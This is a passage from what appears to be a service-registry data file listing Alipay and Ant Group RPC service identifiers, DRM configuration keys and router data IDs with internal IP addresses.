m.manualCacheRelation,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.124.33.109#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.scsupport.common.service.facade.prophet.ProphetManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.imif.common.service.facade.api.MerchantQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.cap.common.service.tenant.CapApplicationService:1.0:internal@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbrecruit.common.service.facade.recruit.query.RecruitPlanQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insautomarket.common.facade.benefit.AutoBenefitFacadeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.acdoccore.common.service.facade.site.SiteDocumentFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lifemng.facade.ebpp.EbppRefundAfterLiquidateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileha.facade.alarmanalysis.AnalysisQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.aeicore.common.service.facade.BalAssetPortionConsultFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.176.92#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.idpatrol.core.service.bizCoverage.BcService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antlink.facade.log.LogServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gotone.common.service.api.ReceiveGotoneSmsService:1.0:securitycore@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antsports.common.service.facade.UserTreasureBoxFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.73.161.232#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_11.124.152.103#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.superapi.common.core.client.AppInvokeService:1.0:gfacceptance@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rcsmart.biz.service.FileService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.voucherprod.facade.api.asset.VcpAssetQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","DATA_ID_10.15.232.16#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.lifemng:name=com.alipay.cif.drm.PasswordRevokeSwitch.operationPasswordRevoked,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.167.222.121#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.finfocore:name=com.alipay.fc.fluxconf.fluxconfClient.drm.CtrlDataResource.pageRows,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","SOFA_PRC_TRANSMIT_FINSECURITYBOSS#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.vega.core.service.SystemParamConfigService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minitrans.service.facade.levelzero.api.LztransQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ebillcenter.common.service.facade.EbillOweInfoQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbdataquery.common.service.facade.api.KbOrderQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:pcreditweb@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paycore.service.common.api.receipt.ReceivePayAckWithResultService:1.0:services@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zdataquery.common.service.facade.hbase.FinTntComposeHbaseQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finorm.core.service.guardian.DrilledEventCoreService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antfeaturelib.common.facade.service.DataViewProtocolQueryService:1.0:publicDomain_insmktdds@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.framework.core.facade.OpscloudClientServiceFacade:1.0:dmng@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.imemberprod.service.facade.api.prod.GlobalBusinessViewService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.riskmodelpredict.common.service.facade.kudu.KuduRpcService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finbatch:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.unknownErrorIntervalSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.cif.facade.BizCertifyRuleService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:inshealthybff@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:funcmaster@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.socialcore.facade.team.TeamFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.rdf.log.conf.BizMonLogConfCtrlDrm.bizMonConf,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.loancore.common.service.facade.alipay.api.rzone.ZlcIntRzoneService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbsales.common.service.facade.bcm.BPProcessCallbackFacade:1.0:shopRateSignExecutor@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_DRMDEMOS#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.lifeprod.common.service.client.ComponentFunctionInvokeManager:1.0:contentlib@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.185.37#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.clivemng.common.service.facade.api.platform.ClvInstanceQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mnotify.biz.client.client.rpc.MNotifyPluginRPCService:1.0:mobilesecurity@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbservcore.common.service.facade.BizIdentityQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.growth.facade.SampleService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insmobile:name=com.alipay.cif.model.cache.CifCOControlSwitch.switchCurUserStatus,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.pointmng:name=com.alipay.pointprod.common.util.resource.PointCapacityDrmResouce.pointCheckInstStart,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.secucommunity.speech.api.reply.ReplyFacadeNew:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:finauth@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofaroute.service.facade.RouteFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finrtcalcenter.common.service.facade.dfinsight.analyse.LabelTableFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cloud.aboss.common.service.facade.AbossUserFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.clearingcenter:name=com.alipay.clearingcenter.core.config.drm.ConditionalShuffleSwitchDRM.conditionalShuffleSwitcher,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.pcinstecoprod.common.service.facade.SampleService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ordermng.common.service.api.order.OrderOperateQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.iacctrans.service.facade.api.v3.AccountTransFacadeV3:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.basementweb.ApplicationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paymentmng.service.facade.settlecore.BankcodeConfigService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.68.140#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.certify.service.facade.OrgCertifyTempStorageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.167.140.91#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.koubei.kbbusinessprod.common.service.facade.api.JinjianBackgroudManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acoffercenter.common.service.facade.metadata.AttrGroupManageFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.ucdpmng.facade.UcdpCreativeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mservicesinspect.common.service.integration.openhome.DeveloperMobileFastAuditFacadeClient:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.unitestcenter.common.service.facade.api.InspectionScenarioFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.242.6#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.antiep.common.service.facade.AntiepOpActivityCustomerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipayplus.mobile.component.common.facade.feed.service.FeedCardQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.core.orderexec.fundapply.config.impl.FundApplyExecConfigDRMResource.sprMaxProfitRate,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobileic.common.service.facade.product.spi.SecurityProductQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:antmembermng@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchservbase.member.facade.MemberFixDataFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbcraftsman.common.facade.risk.CraftsmanRiskFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lowercaseFirst:name=com.alipay.guardian.client.sofa.drm.GuardianDrm.guardianConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.52.64.49#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","SOFA-SCHEDULER-S-S-fintradecenter-three-layers-scheduler#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mymdp.common.service.facade.mpscore.service.load.MpsLoadService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.linke.aci.core.facade.FileStoreService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.166.242.205#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.certifyocr.common.service.facade.VoicePrintService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insptmarket.facade.inssearch.api.SearchRecommendFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.antscheduler.facade.IJobTriggerInstanceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.baoxianquery.common.service.api.InsReportQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promocore.common.service.facade.UserAccessCampQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zcbsalescenter.common.service.facade.cashing.facade.AssetCashingFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finassetpreference.api.facade.IndexFundQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gfas.facade.spi.InwardCancelSpi:1.0:ibizfundprod-inwardCancel-tool@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.routeclient.interfacename:antbuservice#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.AntVip-JavaClient:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.noAvailableServerCheckIntervalSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.appxcore.common.service.facade.api.servicelibrary.ServiceViewQueryCZoneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.buc.acl.api.service.MenuService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pamir.coreclient.attr.AttrProviderService:1.0:opensupport@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:sofaboot-msg-demo@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.sofa.rpc.elastic.ElasticService:1.0:minicenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gmodelcenter.common.service.api.matrix.MatrixAssetFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.bpaas.ecomerchant.facade.attachment.admin.AttachmentFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:antmembermng_journeyReviewCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insxhbprod.core.gray.CommonGrayService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkmportal.service.loan.api.LoanContractFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.inscontentprod.common.service.facade.content.FollowingLifeAppFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.onlinetest.common.service.facade.OnlineExceptResultQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.40.48#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.ipay.ipromocore.common.service.facade.api.CampaignConsultFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lendpofprod:name=com.alipay.lendpofprod.core.shared.drm.LoanP2pConfigDrm.innerBankAvailableAmtStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.clearingcenter.facade.api.ClearingCenterSystemInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_ALI_RATE#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.cif.facade.ContractQueryService:1.0@DEFAULT@cashiercloud_taobao#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.159.223#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.openmonitor.cloudmonitor.service.facade.AlertEventSendQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csplatform.service.contact.facade.CustomCategoryService:1.0.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbtemplate.common.service.facade.assemble.RuleAssembleFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.framework.core.facade.OpscloudClientServiceFacade:1.0:identitymatrixus@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.aliinvoiceprod.integration.einvoice.TaxOptimizationSalaryMessageServiceClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_O_SALESMNG#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.alcontract.common.service.facade.ContractPerformanceQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbsales.common.service.facade.reportorder.KbReportOrderManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.aliplay.inscommunity.common.service.spi.profile.facade.ProfileSpiFacade:1.0:insxhbprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kaleido.common.service.facade.team.TeamKeywordService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.midasCommonTair_dest.ldcTairWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.grscore.common.service.facade.api.recruit.RecruitInterviewFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.routeClient:name=com.alipay.routeclient.DefaultRouteCoordinator.zoneInfo,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.findtprod:name=com.alipay.zoneclient.internal.DynamicLdcSwitchResource.cityVipSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.membertangram.common.service.facade.config.CommonConfigService:1.0:cronInstanceConfigService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinstockprod.atomic.service.facade.order.OrderQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.irecon2.common.service.facade.api.RegisterStatementFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.securitydata:name=com.alipay.securitydata.common.service.velocity.opssla.VelocityPubConfigResource.fraudmng.${service_mode}.loadOffline,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mapi.facade.partner.PartnerExterfaceExtraParamFacade:1.0:mapitool@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.servicegovern.common.service.facade.RouterRuleFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","config:com.alipay.riskdatacenter.service.facade.limit.SelfCureFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.alphaq.common.facade.label.api.ILabelPeriodTaskService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acccenter.common.service.facade.uat.UTaskUserFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.kbtemplate.common.service.facade.assemble.DynamicAssembleFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mbill.domain.facade.ereceipt.EreceiptApplyFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.trdataasset.common.service.facade.query.AppQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dqsyncguard.facade.dag.DagBuildNodeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nodejs.ConsumerService:1.0:zmoperationprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.fraudmng:name=com.alipay.securitysimulate.common.service.client.drm.SimulateReplaceDataClientResource.flag,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.pcloanpromo.service.RepayCouponExchangeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.ryb.drm.RYBParamDrmManager.rybProdListGrayFlag,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.abilitycore.common.service.facade.adapter.SdkSimpleConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.45.64.23#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.finfocore:name=com.alipay.finfocore.common.service.integration.drm.RecSwitcher.userIdList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fundselling.common.service.productx.facade.AssetxStatisticForDWFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_10.15.248.14#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.giftprod.common.service.facade.inner.GiftCrowdInviteGzService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rccenter.common.service.facade.smart.SmartSqlTaskConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cifcommon.uniquery.facade.UniQueryRzoneService:1.0:cif_rz@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finsupport:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.responseExceptionIntervalSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.158.46.98#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.cfin.cffilefactory.facade.licensecheck.FileLicenseMessageFacade:1.0:mlscfilefactory@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.167.184.243#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","cn.com.antcloud.acpartner.common.service.facade.SalesFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_B_EXTERFACE_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.finorm.finriskcenter.common.facade.api.guardian.EventReportServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.hainaprod.common.service.facade.api.abos.AbosContractPerformanceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.openhome.facade.pamir.operator.PamRoleQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.69.213.48#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.charge:name=com.alipay.charge.common.dal.conf.impl.ChargeNewDRMConfigureImpl.switchToFindSameValidDateRate,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.aliinvoiceprod.integration.secretkey.SecretKeyClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.riskmodelpredict.common.service.facade.feature.ExecutorRpcService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchiscore.common.service.facade.MrchisFileExportFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbsales.common.service.download.DownloadCenterCallbackInterface:1.0:socialInsuranceDownloadCenterCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.73.189.255#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.xview.core.common.facade.CallbackService:1.0:TestView1@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instasset.common.service.integration.masterdata.result.code.ResultCodeMapQueryFacadeClient:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:mobilerelation@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.spcenter.facade.bd.BdFeatureManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdatacontext:name=com.alipay.datacontextlib.dataswap.spi.drm.DataSwapGlobalParamDrm.serverSupportGray,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.yebquery.common.facade.service.MultiYebIncomeQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkassetmore.common.service.facade.api.ApprovalBridgeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.koubei.mextitemcenter.common.facade.api.ExtItemManageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipayplus.gmp.openplatform.facade.HandlerDispatcherFacade:1.0:gmp-openplatform-plugin@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdatacontext:name=com.alipay.datacontextlib.dataswap.spi.drm.DataSwapGlobalParamDrm.avoidLoadTestOperationLog,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.agdsroalipay.facade.query.CreditQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alibaba.dataphin.development.common.facade.api.StreamNodeRelationApi:1.0:dpstreaming@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cicada.common.service.facade.api.WareHouseFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openitemcore.common.service.facade.api.market.MarketQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.88.96.7#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.ctuofflineplt.common.facade.service.OfflineJobQueryService:1.0:ctuofflineplt@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.stockassetcore.common.service.facade.api.RemindBackStageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ugstrategycenter.common.service.facade.generated.groupgrowth.crowd.SofaExchangeCrowdFacadeTriple:1.0@tri#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mytradeprod.common.service.facade.BpuFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acassistant.common.service.facade.RuleRunnerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.fcrcportal:name=com.alipay.cif.utils.probe.ProbeDrmSwitch.reportDelay,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","cn.amberdata.metadata.service.MetadataCodeService:1.0:metadataCodeService@bolt#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:ILIQUIDITY_BANK_ACCOUNT@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.filefactory.service.facade.FilePlatformBufferService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.finfocore:name=com.alipay.finfocore.common.service.integration.drm.DrmFopConfig.yogaProgress,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.finpwm:name=com.alipay.finpwm.core.migrate.drm.SceneMigrateTaskDrm.migrateInterceptWhiteList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mrchstm.common.service.facade.mart.facade.v2.AssetSpuQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openinsight.common.service.facade.search.api.SearchOperationRoleFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promomng.common.service.facade.NavigationQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finassetpreference.api.facade.Number2ProjectFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.fcbuservice.common.service.facade.ext.DingDingAppFacade:1.0:antacl@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opssla.common.service.facade.DrmManageFacade:1.0:riskmerchant@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.publiccore.common.service.facade.event.EventSubscribeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cif:name=com.alipay.cif.client.drm.ConvertorClassloaderSwitcher.meta,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.antlaw.common.service.facade.api.AntLegalAgentFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.caprod.service.sign.facade.SignService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ropcn.common.service.facade.api.RopTaskModifyService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openmonitor.qualitycenter.service.facade.ActionAdapterServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.linkw.common.service.facade.OneKeyDeployFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-S-ordermng-sch